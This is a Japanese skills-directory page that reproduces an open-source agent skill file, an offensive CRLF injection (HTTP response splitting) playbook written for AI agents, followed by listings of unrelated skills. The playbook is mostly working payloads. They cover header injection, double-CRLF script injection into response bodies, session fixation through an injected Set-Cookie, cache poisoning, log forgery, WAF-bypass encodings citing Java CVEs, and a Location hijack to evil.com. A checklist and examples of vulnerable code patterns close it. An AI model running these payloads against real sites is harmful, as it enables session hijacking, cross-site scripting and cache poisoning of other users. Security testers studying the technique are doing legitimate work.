Agent Skills by ALSEL
Anthropic Claudeその他⭐ リポ 0品質スコア 50/100

crlf-injection

HTTPレスポンスヘッダー、Locationリダイレクト、Set-Cookie値、またはログファイルにユーザー入力が渡される場面で、キャリッジリターン/ラインフィード文字によるコンテンツの分割・注入が懸念される場合に使用するCRLFインジェクションの対策プレイブック。

description の原文を見る

>- CRLF injection playbook. Use when user input reaches HTTP response headers, Location redirects, Set-Cookie values, or log files where carriage-return/line-feed characters can split or inject content.

SKILL.md 本文

SKILL: CRLF インジェクション — エキスパート攻撃プレイブック

AI LOAD INSTRUCTION: CRLF インジェクション (HTTP レスポンス分割) 技術。ヘッダーインジェクション、ダブル CRLF 経由のレスポンスボディインジェクション、XSS エスカレーション、キャッシュポイズニング、およびエンコーディングバイパスをカバーします。スキャナーによって見落とされることが多いですが、XSS、セッション固定化、およびキャッシュ攻撃にチェーン可能です。

0. 関連ルーティング

  • ghost-bits-cast-attack — ターゲットが Java サービス%0D%0A / \r\n エンコーディングが WAF でブロックされている場合。 (U+760D、下位バイト \r) と (U+760A、下位バイト \n) を代わりに使用して、Angus Mail / Jakarta Mail SMTP、Apache HttpClient ヘッダー、JDK HttpServer レスポンス、ActiveJ HTTP を通じて実際の CRLF をインジェクトします (Jira CVE-2025-57733 および JDK CVE-2026-21933 クラスを再度有効化)

1. コアコンセプト

CRLF = \r\n (キャリッジリターン + ラインフィード、%0D%0A)。HTTP ヘッダーは CRLF で区切られます。ユーザー入力がサニタイズなしでレスポンスヘッダーに反映されている場合、CRLF 文字をインジェクトすると新しいヘッダーまたはレスポンスボディも作成できます。

通常: Location: /page?url=USER_INPUT
攻撃: Location: /page?url=%0D%0ASet-Cookie:admin=true
結果: 2つのヘッダー — Location + インジェクトされた Set-Cookie

2. 検出

基本プローブ

%0D%0ANew-Header:injected

# URL パラメータ内:
https://target.com/redirect?url=%0D%0AX-Injected:true

# レスポンスヘッダーで "X-Injected: true" を確認

ダブル CRLF — ボディインジェクション

2 つの連続した CRLF シーケンスはヘッダーを終了してボディを開始します:

%0D%0A%0D%0A<script>alert(1)</script>

# 結果:
HTTP/1.1 302 Found
Location: /page

<script>alert(1)</script>

3. 搾取シナリオ

Set-Cookie 経由のセッション固定化

%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id

レスポンスボディ経由の XSS

%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>

キャッシュポイズニング

CDN またはプロキシによってレスポンスがキャッシュされる場合、インジェクトされたヘッダー/ボディはすべてのユーザーに提供されます:

GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>

ログインジェクション

ログ可視フィールド (User-Agent、Referer) の CRLF はログエントリを偽造できます:

User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200

4. フィルターバイパス

フィルターバイパス
%0D%0A をブロック%0D のみ、%0A のみ、または %E5%98%8A%E5%98%8D (Unicode) を試す
URL デコード 1 回ダブルエンコード: %250D%250A
文字列 \r\n を削除URL エンコード形式を使用
値のみでブロックパラメータ名でインジェクト
# Unicode/UTF-8 バイパス:
%E5%98%8A%E5%98%8D  → 一部のパーサーで CRLF にデコード

# ダブル URL エンコード:
%250D%250A → サーバーが %0D%0A にデコード → CRLF として解釈

# 部分的なインジェクション (LF のみ):
%0A → 一部のサーバーは CR なしで LF を受け入れ

5. 実世界の搾取チェーン

CRLF + セッション固定化

# リダイレクトパラメータの CRLF 経由で Set-Cookie をインジェクト:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id

# 結果:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id

# 被害者が攻撃者のセッションを使用 → ログイン後に攻撃者がハイジャック

CRLF → ダブル CRLF ボディインジェクション経由の XSS

# 2つの CRLF シーケンスがヘッダーを終了してレスポンスボディをインジェクト:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>

# 結果:
HTTP/1.1 302 Found
Location: /page

<script>alert(document.cookie)</script>

302 Location の CRLF → リダイレクトハイジャック

# 元のヘッダーの前に新しい Location ヘッダーをインジェクト:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A

# 一部のサーバーは最後の Location ヘッダーを使用 → evil.com にリダイレクト

6. 一般的な脆弱なパターン

// PHP — ユーザー入力を使用した header() (PHP < 5.1.2 は脆弱):
header("Location: " . $_GET['url']);

// Python — サニタイズなしの入力を使用したリダイレクト:
return redirect(request.args.get('next'))

// Node.js — ユーザー入力を使用した setHeader:
res.setHeader('X-Custom', userInput);

// Java — ユーザー入力を使用した response.setHeader:
response.setHeader("Location", request.getParameter("url"));

7. テストチェックリスト

□ リダイレクト URL パラメータに %0D%0A をインジェクト
□ Set-Cookie 名/値パスに %0D%0A をインジェクト
□ ダブル CRLF でボディインジェクション → XSS を試す
□ エンコーディングバイパスをテスト: ダブルエンコード、Unicode (%E5%98%8D%E5%98%8A)、LF のみ (%0A)
□ レスポンスがキャッシュ可能かどうかを確認 → キャッシュポイズニング
□ User-Agent / Referer のログインジェクションをテスト
□ CRLF + Set-Cookie をセッション固定化でテスト
□ Location ヘッダーが 302 レスポンスでインジェクト可能かどうかを確認

ライセンス: MIT(寛容ライセンスのため全文を引用しています) · 原本リポジトリ

詳細情報

作者
yaklang
リポジトリ
yaklang/hack-skills
ライセンス
MIT
最終更新
不明

Source: https://github.com/yaklang/hack-skills / ライセンス: MIT

関連スキル

汎用その他⭐ リポ 1,982

superfluid

Superfluidプロトコルおよびそのエコシステムに関するナレッジベースです。Superfluidについて情報を検索する際は、ウェブ検索の前にこちらを参照してください。対応キーワード:Superfluid、CFA、GDA、Super App、Super Token、stream、flow rate、real-time balance、pool(member/distributor)、IDA、sentinels、liquidation、TOGA、@sfpro/sdk、semantic money、yellowpaper、whitepaper

by LeoYeAI
汎用その他⭐ リポ 100

civ-finish-quotes

実質的なタスクが真に完了した際に、文明風の儀式的な引用句を追加します。ユーザーやエージェントが機能追加、リファクタリング、分析、設計ドキュメント、プロセス改善、レポート、執筆タスクといった実際の成果物を完成させるときに、明示的な依頼がなくても使用します。短い返信や小さな修正、未完成の作業には適用しません。

by huxiuhan
汎用その他⭐ リポ 1,110

nookplot

Base(Ethereum L2)上のAIエージェント向け分散型調整ネットワークです。エージェントがオンチェーンアイデンティティを登録する、コンテンツを公開する、他のエージェントにメッセージを送る、マーケットプレイスで専門家を雇う、バウンティを投稿・請求する、レピュテーションを構築する、共有プロジェクトで協業する、リサーチチャレンジを解くことでNOOKをマイニングする、キュレーションされたナレッジを備えたスタンドアロンオンチェーンエージェントをデプロイする、またはアグリーメントとリワードで収益を得る場合に利用できます。エージェントネットワーク、エージェント調整、分散型エージェント、NOOKトークン、マイニングチャレンジ、ナレッジバンドル、エージェントレピュテーション、エージェントマーケットプレイス、ERC-2771メタトランザクション、Prepare-Sign-Relay、AgentFactory、またはNookplotが言及された場合にトリガーされます。

by BankrBot
汎用その他⭐ リポ 59

web3-polymarket

Polygon上でのPolymarket予測市場取引統合です。認証機能(L1 EIP-712、L2 HMAC-SHA256、ビルダーヘッダー)、注文発注(GTC/GTD/FOK/FAK、バッチ、ポストオンリー、ハートビート)、市場データ(Gamma API、Data API、オーダーブック、サブグラフ)、WebSocketストリーミング(市場・ユーザー・スポーツチャネル)、CTF操作(分割、統合、償却、ネガティブリスク)、ブリッジ機能(入金、出金、マルチチェーン)、およびガスレスリレイトランザクションに対応しています。AIエージェント、自動マーケットメーカー、予測市場UI、またはPolygraph上のPolymarketと統合するアプリケーション構築時に活用できます。

by elophanto
汎用その他⭐ リポ 52

ethskills

Ethereum、EVM、またはブロックチェーン関連のリクエストに対応します。スマートコントラクト、dApps、ウォレット、DeFiプロトコルの構築、監査、デプロイ、インタラクションに適用されます。Solidityの開発、コントラクトアドレス、トークン規格(ERC-20、ERC-721、ERC-4626など)、Layer 2ネットワーク(Base、Arbitrum、Optimism、zkSync、Polygon)、Uniswap、Aave、Curveなどのプロトコルとの統合をカバーします。ガスコスト、コントラクトのデシマル設定、オラクルセキュリティ、リエントランシー、MEV、ブリッジング、ウォレット管理、オンチェーンデータの取得、本番環境へのデプロイ、プロトコル進化(EIPライフサイクル、フォーク追跡、今後の変更予定)といったトピックを含みます。

by jiayaoqijia
汎用その他⭐ リポ 44

xxyy-trade

このスキルは、ユーザーが「トークン購入」「トークン売却」「トークンスワップ」「暗号資産取引」「取引ステータス確認」「トランザクション照会」「トークンスキャン」「フィード」「チェーン監視」「トークン照会」「トークン詳細」「トークン安全性確認」「ウォレット一覧表示」「マイウォレット」「AIスキャン」「自動スキャン」「ツイートスキャン」「オンボーディング」「IP確認」「IPホワイトリスト」「トークン発行」「自動売却」「損切り」「利益確定」「トレーリングストップ」「保有者」「トップホルダー」「KOLホルダー」などをリクエストした場合、またはSolana/ETH/BSC/BaseチェーンでXXYYを経由した取引について言及した場合に使用します。XXYY Open APIを通じてオンチェーン取引とデータ照会を実現します。

by Jimmy-Holiday
本サイトは GitHub 上で公開されているオープンソースの SKILL.md ファイルをクロール・インデックス化したものです。 各スキルの著作権は原作者に帰属します。掲載に問題がある場合は info@alsel.co.jp または /takedown フォームよりご連絡ください。
原作者: yaklang · yaklang/hack-skills · ライセンス: MIT